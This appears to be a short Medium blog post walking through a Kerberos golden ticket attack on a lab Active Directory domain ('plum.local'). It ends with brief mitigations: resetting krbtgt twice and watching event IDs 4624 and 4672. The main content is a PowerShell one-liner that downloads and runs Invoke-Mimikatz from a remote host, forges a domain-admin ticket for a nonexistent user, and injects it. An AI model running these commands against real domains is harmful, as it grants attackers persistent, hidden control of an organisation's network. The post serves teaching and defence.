Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1–5–21–XXXXXXXXX–XXXXXXXXXX–XXXXXXXXXX /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080”’iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::ptt ticket.kirbi”’
Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Resetting the krbtgt password (twice) to invalidate current golden tickets
  • Review and filter Security Event ID 4624 and 4672

References:

Disclaimer:

--

--

--

Cyber Security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

json.decoder.JSONDecodeError: Invalid control character at: line 1 column 15 (char 14)

JSON based XSS

Cloud Security

Regulating the Cyberspace: Marietje Schaake in Conversation with Azeem Azhar

The Lendefi Testnet: Community Engagement

SpiderDAO’s 1st project is growing up!

Drip Network — What is hiding deeply behind the project and why all holders’ funds may be lost.

A Computer Spying Method You’ve Probably Never Heard Of

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mike Bond

Mike Bond

Cyber Security Enthusiast

More from Medium

3rd Simple & White-collar things about CyberSecurity

WHY 2-FACTOR AUTHENTICATION IS CRUCIAL

Convert Veracode XML Report to Excel Report

Your Device Can Be Hacked If You Have Bluetooth!

Bluetooth can be used to hack devices